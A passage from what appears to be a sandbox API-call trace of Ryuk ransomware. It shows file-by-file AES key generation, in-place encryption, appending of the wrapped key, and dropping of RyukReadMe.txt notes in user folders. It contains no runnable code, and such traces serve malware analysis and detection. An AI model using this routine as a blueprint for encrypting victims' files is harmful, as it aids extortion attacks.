hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0150.995] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.995] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact", dwFileAttributes=0x80) returned 1 [0150.995] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0150.995] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=1172) returned 1 [0150.995] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=1172) returned 1 [0150.996] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x372, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.996] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0150.997] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.997] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0150.997] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.997] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.997] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x494, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x494, lpOverlapped=0x0) returned 1 [0150.997] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0150.997] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x494, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x4a0) returned 1 [0150.997] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.997] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x4a0, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x4a0, lpOverlapped=0x0) returned 1 [0150.997] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0150.997] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0150.997] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0150.998] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0150.998] CloseHandle (hObject=0x188) returned 1 [0151.020] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.024] CryptDestroyKey (hKey=0x3b8690) returned 1 [0151.024] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.024] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0151.024] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0151.024] SetLastError (dwErrCode=0x0) [0151.024] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0151.028] GetLastError () returned 0x0 [0151.028] WriteFile (in: hFile=0x184, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad9a0*=0x320, lpOverlapped=0x0) returned 1 [0151.028] CloseHandle (hObject=0x184) returned 1 [0151.029] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0151.029] SetLastError (dwErrCode=0x0) [0151.029] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0151.029] GetLastError () returned 0xb7 [0151.029] CloseHandle (hObject=0x184) returned 1 [0151.029] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0xffffffffffffffff [0151.029] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0151.029] SetLastError (dwErrCode=0x0) [0151.029] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0151.030] GetLastError () returned 0x0 [0151.030] WriteFile (in: hFile=0x184, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad9a0*=0x320, lpOverlapped=0x0) returned 1 [0151.031] CloseHandle (hObject=0x184) returned 1 [0151.031] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0151.031] SetLastError (dwErrCode=0x0) [0151.031] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0151.031] GetLastError () returned 0xb7 [0151.031] CloseHandle (hObject=0x184) returned 1 [0151.031] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0151.031] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0151.031] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0151.031] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0151.032] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\a W R6WAp rh-ZZMT.gif", dwFileAttributes=0x80) returned 1 [0151.032] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\a W R6WAp rh-ZZMT.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\a w r6wap rh-zzmt.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0151.032] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=70832) returned 1 [0151.032] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=70832) returned 1 [0151.032] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x1138e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.032] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0151.033] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.033] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0151.033] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0151.033] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.033] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x114b0, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x114b0, lpOverlapped=0x0) returned 1 [0151.034] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0151.034] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x114b0, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x114c0) returned 1 [0151.035] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.035] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x114c0, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x114c0, lpOverlapped=0x0) returned 1 [0151.035] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0151.035] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0151.035] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0151.035] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0151.036] CloseHandle (hObject=0x188) returned 1 [0151.052] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.056] CryptDestroyKey (hKey=0x3b8690) returned 1 [0151.056] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.057] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0151.057] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0151.057] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\b0N2wjc 0o1dxBD23-6.png", dwFileAttributes=0x80) returned 1 [0151.057] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\b0N2wjc 0o1dxBD23-6.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\b0n2wjc 0o1dxbd23-6.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0151.057] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=98731) returned 1 [0151.058] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=98731) returned 1 [0151.058] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x18089, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.058] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0151.058] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.058] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0151.058] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0151.058] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.058] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x181ab, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x181ab, lpOverlapped=0x0) returned 1 [0151.060] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0151.060] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x181ab, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x181b0) returned 1 [0151.060] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.061] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x181b0, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x181b0, lpOverlapped=0x0) returned 1 [0151.061] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0151.061] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0151.061] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0151.061] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0151.061] CloseHandle (hObject=0x188) returned 1 [0151.106] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.110] CryptDestroyKey (hKey=0x3b8690) returned 1 [0151.110] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.110] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0151.110] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0151.110] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bOe50VSDDmx6ipxzQ.wav", dwFileAttributes=0x80) returned 1 [0151.111] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bOe50VSDDmx6ipxzQ.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\boe50vsddmx6ipxzq.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0151.111] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=48692) returned 1 [0151.111] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=48692) returned 1 [0151.111] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xbd12, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.111] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0151.112] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.112] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0151.112] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0151.112] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.112] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0xbe34, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0xbe34, lpOverlapped=0x0) returned 1 [0151.113] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0151.113] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xbe34, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xbe40) returned 1 [0151.113] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.113] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xbe40, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0xbe40, lpOverlapped=0x0) returned 1 [0151.113] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0151.113] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0151.113] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0151.113] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0151.113] CloseHandle (hObject=0x188) returned 1 [0151.128] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.145] CryptDestroyKey (hKey=0x3b8690) returned 1 [0151.145] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.145] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0151.145] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0151.145] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CL0sCWPqBpaqsNsSV.swf", dwFileAttributes=0x80) returned 1 [0151.146] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CL0sCWPqBpaqsNsSV.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cl0scwpqbpaqsnssv.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0151.146] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=3496) returned 1 [0151.146] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=3496) returned 1 [0151.146] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xc86, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.146] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0151.147] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.147] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0151.147] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0151.147] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.147] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0xda8, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0xda8, lpOverlapped=0x0) returned 1 [0151.147] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0151.147] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xda8, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xdb0) returned 1 [0151.148] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.148] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xdb0, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0xdb0, lpOverlapped=0x0) returned 1 [0151.148] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0151.148] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0151.148] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0151.148] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0151.148] CloseHandle (hObject=0x188) returned 1 [0151.164] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.168] CryptDestroyKey (hKey=0x3b8690) returned 1 [0151.168] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.168] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0151.168] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0151.168] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0151.169] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DL6V6qq-b6O_8Foo5Q6l.mkv", dwFileAttributes=0x80) returned 1 [0151.169] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 